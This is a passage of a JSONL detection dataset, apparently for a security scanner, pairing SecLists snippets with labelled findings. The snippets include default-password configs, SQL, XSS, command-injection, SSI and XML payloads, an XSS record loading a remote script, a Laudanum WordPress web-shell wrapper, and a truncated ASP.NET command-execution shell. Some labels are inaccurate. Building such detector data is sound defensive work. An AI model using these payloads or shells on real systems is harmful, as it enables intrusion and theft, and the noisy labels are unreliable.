"source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:narnia@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "narnia"}}]} {"id": "seclists_00186", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:eQ-3,root,MuZhlo9n%8!G,", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "eQ-3,root,MuZhlo9n%8!G,"}}]} {"id": "seclists_00187", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = '') or true--';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "') or true--", "injection_type": "SQL"}}]} {"id": "seclists_00188", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<style onmousedown=\"alert(1)\">test</style> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style onmousedown=\"alert(1)\">test</style>", "injection_type": "XSS"}}]} {"id": "seclists_00189", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%7Cecho$IFSFUOWKT$((11%2B83))$(echo$IFSFUOWKT)FUOWKT' HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7Cecho$IFSFUOWKT$((11%2B83))$(echo$IFSFUOWKT)FUOWKT'", "injection_type": "cmd"}}]} {"id": "seclists_00190", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><mark onblur=alert(1) tabindex=1 id=x></mark><input autofocus></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<mark onblur=alert(1) tabindex=1 id=x></mark><input autofocus>", "injection_type": "XSS"}}]} {"id": "seclists_00191", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#echo var=\"document_uri\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#echo var=\"document_uri\" -->", "injection_type": "SSI"}}]} {"id": "seclists_00192", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit Name: Self-contained XSS variant 8 HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: Self-contained XSS variant 8", "injection_type": "XSS"}}]} {"id": "seclists_00193", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = '1 or sleep(__TIME__)#';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "1 or sleep(__TIME__)#", "injection_type": "SQL"}}]} {"id": "seclists_00194", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: &#X03c", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#X03c", "injection_type": "cmd"}}]} {"id": "seclists_00195", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NWAYIZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NWAYIZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C", "injection_type": "cmd"}}]} {"id": "seclists_00196", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><style>@keyframes x{}</style><mark style=\"animation-name:x\" onanimationstart=\"alert(1)\"></mark></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>@keyframes x{}</style><mark style=\"animation-name:x\" onanimationstart=\"alert(1)\"></mark>", "injection_type": "XSS"}}]} {"id": "seclists_00197", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=/../../../../../../../../%2A HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "/../../../../../../../../%2A", "injection_type": "cmd"}}]} {"id": "seclists_00198", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>\"><script src=//brutelogic.com.br&sol;1.js&num;</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\"><script src=//brutelogic.com.br&sol;1.js&num;", "injection_type": "XSS"}}]} {"id": "seclists_00199", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=procedure HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "procedure", "injection_type": "SQL"}}]} {"id": "seclists_00200", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %0A%20str%3D%24%28echo%20NNDFMH%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0A%20str%3D%24%28echo%20NNDFMH%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27", "injection_type": "cmd"}}]} {"id": "seclists_00201", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><div draggable=\"true\" contenteditable>drag me</div><shadow ondragover=alert(1) contenteditable>drop here</shadow></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<div draggable=\"true\" contenteditable>drag me</div><shadow ondragover=alert(1) contenteditable>drop here</shadow>", "injection_type": "XSS"}}]} {"id": "seclists_00202", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Tags: general, evil tags, JSON, obfuscated\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, evil tags, JSON, obfuscated", "injection_type": "XSS"}}]} {"id": "seclists_00203", "source": "seclists", "source_license": "MIT", "text": "<?php\n/**\n * Plugin Name: Laudanum\n * Description: This plugin is leveraged for running security tests and should be left disabled when not in use.\n * Author: Jason Gillam and the Laudanum Team\n * Version: 0.02\n */\n \n \n /* *****************************************************************************\n***\n*** Laudanum Project\n*** A Collection of Injectable Files used during a Penetration Test\n***\n*** More information is available at:\n*** http://laudanum.secureideas.net\n*** laudanum@secureideas.net\n***\n*** Project Leads:\n*** Kevin Johnson <kjohnson@secureideas.net>\n*** Tim Medin <tim@counterhack.com>\n***\n*** Copyright 2014 by Kevin Johnson and the Laudanum Team\n***\n********************************************************************************\n***\n*** This file is a Word Press plugin wrapper for Laudanum's PHP tools. As with \n*** other Word Press plugins, this entire directory should be zipped up for deployment.\n*** The templates/ipcheck.php file should be updated with the tester's IP address first.\n***\n*** Written by Jason Gillam <jgillam@secureideas.com>\n***\n********************************************************************************\n*** This program is free software; you can redistribute it and/or\n*** modify it under the terms of the GNU General Public License\n*** as published by the Free Software Foundation; either version 2\n*** of the License, or (at your option) any later version.\n*** \n*** This program is distributed in the hope that it will be useful,\n*** but WITHOUT ANY WARRANTY; without even the implied warranty of\n*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n*** GNU General Public License for more details.\n*** \n*** You can get a copy of the GNU General Public License from this\n*** address: http://www.gnu.org/copyleft/gpl.html#SEC1\n*** You can also write to the Free Software Foundation, Inc., 59 Temple\n*** Place - Suite 330, Boston, MA 02111-1307, USA.\n***\n***************************************************************************** */\n \n if(!class_exists(\"WP_Laudanum\"))\n {\n \tclass WP_Laudanum\n \t{\n \t\n \t\tpublic function __construct()\n \t\t{\n \t\t\tadd_action('admin_menu', array(&$this, 'add_menu'));\n \t\t}\n \t\n \t\tpublic function __activate()\n \t\t{\n \t\n \t\t}\n \t\n \t\tpublic function __deactivate()\n \t\t{\n \t\n \t\t}\n \t\t\n \t\tpublic function add_menu()\n \t\t{\n \t\t\tadd_options_page('Laudanum Settings', 'Laudanum', 'manage_options', 'wp_laudanum', array(&$this, 'plugin_settings_page')); \t\t\t\n \t\t}\n \t\t\n \t\tpublic function plugin_settings_page()\n \t\t{\n \t\t\tif(!current_user_can('manage_options'))\n \t\t\t{\n \t\t\t\twp_die(__('You do not have sufficient permissions to access this page.'));\n \t\t\t}\n \t\t\t\n \t\t\tinclude(sprintf(\"%s/templates/settings.php\", dirname(__FILE__)));\t\n \t\t}\n \t}\n \t\n \tregister_activation_hook(__FILE__, array('WP_Laudanum', 'activate'));\n \tregister_deactivation_hook(__FILE__, array('WP_Laudanum', 'deactivate'));\n \t\n \t$wp_laudanum = new WP_Laudanum();\n \t\n \tif(isset($wp_laudanum)) { \n \t\tfunction plugin_settings_link($links)\n \t\t\t{ \n \t\t\t$settings_link = '<a href=\"options-general.php?page=wp_laudanum\">Settings</a>'; \n \t\t\tarray_unshift($links, $settings_link); \n \t\t\treturn $links; \n \t\t} \n \t\t\n \t\t$plugin = plugin_basename(__FILE__); \n \t\tadd_filter(\"plugin_action_links_$plugin\", 'plugin_settings_link'); \n \t}\n \t\n }\n \n \n \n ?>", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "compliance": [], "fields": {"shell_type": "php", "filename": "laudanum.php"}}]} {"id": "seclists_00204", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=' or a=a-- HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "' or a=a--", "injection_type": "cmd"}}]} {"id": "seclists_00205", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf NULL", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "NULL", "injection_type": "cmd"}}]} {"id": "seclists_00206", "source": "seclists", "source_license": "MIT", "text": "POST /api/import HTTP/1.1\nContent-Type: application/xml\n\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><foo><![CDATA[' or 1=1 or ''=']]></foo>", "findings": [{"category": "malicious", "subcategory": "malicious.xxe", "severity": "critical", "compliance": [], "fields": {"payload": "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><foo><![CDATA[' or 1=1 or ''=']]></foo>", "injection_type": "XXE"}}]} {"id": "seclists_00207", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:\"GE Security, Inc.\",install,install,http://www.qdigital.us/soporte/CasiRusco/Casirusco-documentation/controllers/460972001B.pdf@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "\"GE Security, Inc.\",install,install,http://www.qdigital.us/soporte/CasiRusco/Casirusco-documentation/controllers/460972001B.pdf"}}]} {"id": "seclists_00208", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Description: This vector concatenates a string and evaluates it via filling the URL property with payload concatenated in a string via ternary operators.\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: This vector concatenates a string and evaluates it via filling the URL property with payload concatenated in a string via ternary operators.", "injection_type": "XSS"}}]} {"id": "seclists_00209", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">JavaScript-breaker using carriage return</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "JavaScript-breaker using carriage return", "injection_type": "XSS"}}]} {"id": "seclists_00210", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<marquee onbeforecopy=\"alert(1)\" contenteditable>test</marquee>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<marquee onbeforecopy=\"alert(1)\" contenteditable>test</marquee>", "injection_type": "XSS"}}]} {"id": "seclists_00211", "source": "seclists", "source_license": "MIT", "text": "POST /api/login HTTP/1.1\nContent-Type: application/json\n\n|| 1==1", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "|| 1==1", "injection_type": "NoSQL"}}]} {"id": "seclists_00212", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host='echo$IFSJWHAWX$((24%2B49))$(echo$IFSJWHAWX)JWHAWX\" HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'echo$IFSJWHAWX$((24%2B49))$(echo$IFSJWHAWX)JWHAWX\"", "injection_type": "cmd"}}]} {"id": "seclists_00213", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<ins onfocusout=alert(1) tabindex=1 id=x></ins><input autofocus> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<ins onfocusout=alert(1) tabindex=1 id=x></ins><input autofocus>", "injection_type": "XSS"}}]} {"id": "seclists_00214", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><form onsubmit=alert(1)><input type=submit></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<form onsubmit=alert(1)><input type=submit>", "injection_type": "XSS"}}]} {"id": "seclists_00215", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host='%0aecho$IFSMOMQCI$((63%2B38))$(echo$IFSMOMQCI)MOMQCI%7C HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'%0aecho$IFSMOMQCI$((63%2B38))$(echo$IFSMOMQCI)MOMQCI%7C", "injection_type": "cmd"}}]} {"id": "seclists_00216", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = 'declare @q nvarchar (200) 0x730065006c00650063 ...';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "declare @q nvarchar (200) 0x730065006c00650063 ...", "injection_type": "SQL"}}]} {"id": "seclists_00217", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:mafia", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "mafia"}}]} {"id": "seclists_00218", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=\"%26echo%20QKCGPP$((73%2B25))$(echo%20QKCGPP)QKCGPP HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\"%26echo%20QKCGPP$((73%2B25))$(echo%20QKCGPP)QKCGPP", "injection_type": "cmd"}}]} {"id": "seclists_00219", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=id%00| HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "id%00|", "injection_type": "cmd"}}]} {"id": "seclists_00220", "source": "seclists", "source_license": "MIT", "text": "filename=%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20GFPZMF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20GFPZMF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//", "injection_type": "cmd"}}]} {"id": "seclists_00221", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit String: document.__parent__._=alert HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: document.__parent__._=alert", "injection_type": "XSS"}}]} {"id": "seclists_00222", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Tags: super short, general, basic\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: super short, general, basic", "injection_type": "XSS"}}]} {"id": "seclists_00223", "source": "seclists", "source_license": "MIT", "text": "password: Novell,GUEST,<BLANK>,\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Novell,GUEST,<BLANK>,"}}]} {"id": "seclists_00224", "source": "seclists", "source_license": "MIT", "text": "filename=\"%26echo$IFSSWZDEK$((23%2B62))$(echo$IFSSWZDEK)SWZDEK%22", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\"%26echo$IFSSWZDEK$((23%2B62))$(echo$IFSSWZDEK)SWZDEK%22", "injection_type": "cmd"}}]} {"id": "seclists_00225", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: <<<", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<<<", "injection_type": "cmd"}}]} {"id": "seclists_00226", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=\" or 0=0 -- HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\" or 0=0 --", "injection_type": "cmd"}}]} {"id": "seclists_00227", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><style>:target {color:red;}</style><a id=x style=\"transition:color 1s\" ontransitionend=alert(1)></a></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>:target {color:red;}</style><a id=x style=\"transition:color 1s\" ontransitionend=alert(1)></a>", "injection_type": "XSS"}}]} {"id": "seclists_00228", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit String: s1=!''&&'jav';s2=!''&&'ascript';s3=!''&&':';s4=!''&&'aler';s5=!''&&'t';s6=!''&&'(1)';s7=s1+s2+s3+s4+s5+s6;URL=s7;</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: s1=!''&&'jav';s2=!''&&'ascript';s3=!''&&':';s4=!''&&'aler';s5=!''&&'t';s6=!''&&'(1)';s7=s1+s2+s3+s4+s5+s6;URL=s7;", "injection_type": "XSS"}}]} {"id": "seclists_00229", "source": "seclists", "source_license": "MIT", "text": "filename=%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UFTNKA%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UFTNKA%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23", "injection_type": "cmd"}}]} {"id": "seclists_00230", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit String: <TABLE BACKGROUND=\"javascript:alert('XSS')\"></TABLE> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: <TABLE BACKGROUND=\"javascript:alert('XSS')\"></TABLE>", "injection_type": "XSS"}}]} {"id": "seclists_00231", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=&#060; HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#060;", "injection_type": "cmd"}}]} {"id": "seclists_00232", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=&#X000003C; HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#X000003C;", "injection_type": "cmd"}}]} {"id": "seclists_00233", "source": "seclists", "source_license": "MIT", "text": "filename=&#X3C;", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#X3C;", "injection_type": "cmd"}}]} {"id": "seclists_00234", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#echo var=\"request_uri\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#echo var=\"request_uri\" -->", "injection_type": "SSI"}}]} {"id": "seclists_00235", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=sponge\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "sponge"}}]} {"id": "seclists_00236", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=fishes\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "fishes"}}]} {"id": "seclists_00237", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><div draggable=\"true\" contenteditable>drag me</div><thead ondragover=alert(1) contenteditable>drop here</thead></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<div draggable=\"true\" contenteditable>drag me</div><thead ondragover=alert(1) contenteditable>drop here</thead>", "injection_type": "XSS"}}]} {"id": "seclists_00238", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"0?'':'ascr';s3=0?'':'ipt';s4=0?'':':';s5=0?'':'ale';s6=0?'':'rt';s7=\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "0?'':'ascr';s3=0?'':'ipt';s4=0?'':':';s5=0?'':'ale';s6=0?'':'rt';s7=", "injection_type": "XSS"}}]} {"id": "seclists_00239", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit Description: Assuming you can only fit in a few characters and it filters against \u201d.js\u201d you can rename your JavaScript file to an image as an XSS vector.</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: Assuming you can only fit in a few characters and it filters against \u201d.js\u201d you can rename your JavaScript file to an image as an XSS vector.", "injection_type": "XSS"}}]} {"id": "seclists_00240", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;>", "injection_type": "XSS"}}]} {"id": "seclists_00241", "source": "seclists", "source_license": "MIT", "text": "password: hawkeyes\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "hawkeyes"}}]} {"id": "seclists_00242", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<script/src=\"data:&comma;eval(atob(location.hash.slice(1)))//#alert(1)\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<script/src=\"data:&comma;eval(atob(location.hash.slice(1)))//#alert(1)", "injection_type": "XSS"}}]} {"id": "seclists_00243", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf 1;SELECT%20*", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "1;SELECT%20*", "injection_type": "cmd"}}]} {"id": "seclists_00244", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<time onpaste=\"alert(1)\" contenteditable>test</time> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<time onpaste=\"alert(1)\" contenteditable>test</time>", "injection_type": "XSS"}}]} {"id": "seclists_00245", "source": "seclists", "source_license": "MIT", "text": "filename=/etc/shadow", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "/etc/shadow", "injection_type": "cmd"}}]} {"id": "seclists_00246", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><frame onmouseup=\"alert(1)\">test</frame></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<frame onmouseup=\"alert(1)\">test</frame>", "injection_type": "XSS"}}]} {"id": "seclists_00247", "source": "seclists", "source_license": "MIT", "text": "password: towers\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "towers"}}]} {"id": "seclists_00248", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><colgroup draggable=\"true\" ondragenter=\"alert(1)\">test</colgroup></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<colgroup draggable=\"true\" ondragenter=\"alert(1)\">test</colgroup>", "injection_type": "XSS"}}]} {"id": "seclists_00249", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Author Name: ha.ckers.org</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: ha.ckers.org", "injection_type": "XSS"}}]} {"id": "seclists_00250", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf ' or 0=0 #", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "' or 0=0 #", "injection_type": "cmd"}}]} {"id": "seclists_00251", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=x' OR full_name LIKE '%Bob% HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "x' OR full_name LIKE '%Bob%", "injection_type": "SQL"}}]} {"id": "seclists_00252", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Author Name: ha.ckers.org</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: ha.ckers.org", "injection_type": "XSS"}}]} {"id": "seclists_00253", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf PRINT @@variable", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "PRINT @@variable", "injection_type": "cmd"}}]} {"id": "seclists_00254", "source": "seclists", "source_license": "MIT", "text": "username=\"hi\"\") or (\"\"a\"\"=\"\"a\"&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\"hi\"\") or (\"\"a\"\"=\"\"a\"", "injection_type": "SQL"}}]} {"id": "seclists_00255", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=..%%35c HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "..%%35c", "injection_type": "cmd"}}]} {"id": "seclists_00256", "source": "seclists", "source_license": "MIT", "text": "<%@ Page Language=\"C#\" Debug=\"true\" Trace=\"false\" %>\n<%@ Import Namespace=\"System.Diagnostics\" %>\n<%@ Import Namespace=\"System.IO\" %>\n<script Language=\"c#\" runat=\"server\">\nvoid Page_Load(object sender, EventArgs e)\n{\n}\nstring ExcuteCmd(string arg)\n{\nProcessStartInfo psi = new ProcessStartInfo();\npsi.FileName = \"cmd.exe\";\npsi.Arguments = \"/c \"+arg;\npsi.RedirectStandardOutput = true;\npsi.UseShellExecute = false;\nProcess p = Process.Start(psi);\nStreamReader stmrdr = p.StandardOutput;\nstring s = stmrdr.ReadToEnd();\nstmrdr.Close();\nreturn s;\n}\nvoid cmdExe_Click(object sender, System.EventArgs e)\n{\nResponse.Write(\"<pre>\");\nResponse.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));\nResponse.Write(\"</pre>\");\n}\n</script>\n<HTML>\n<HEAD>\n<title>awen asp.net 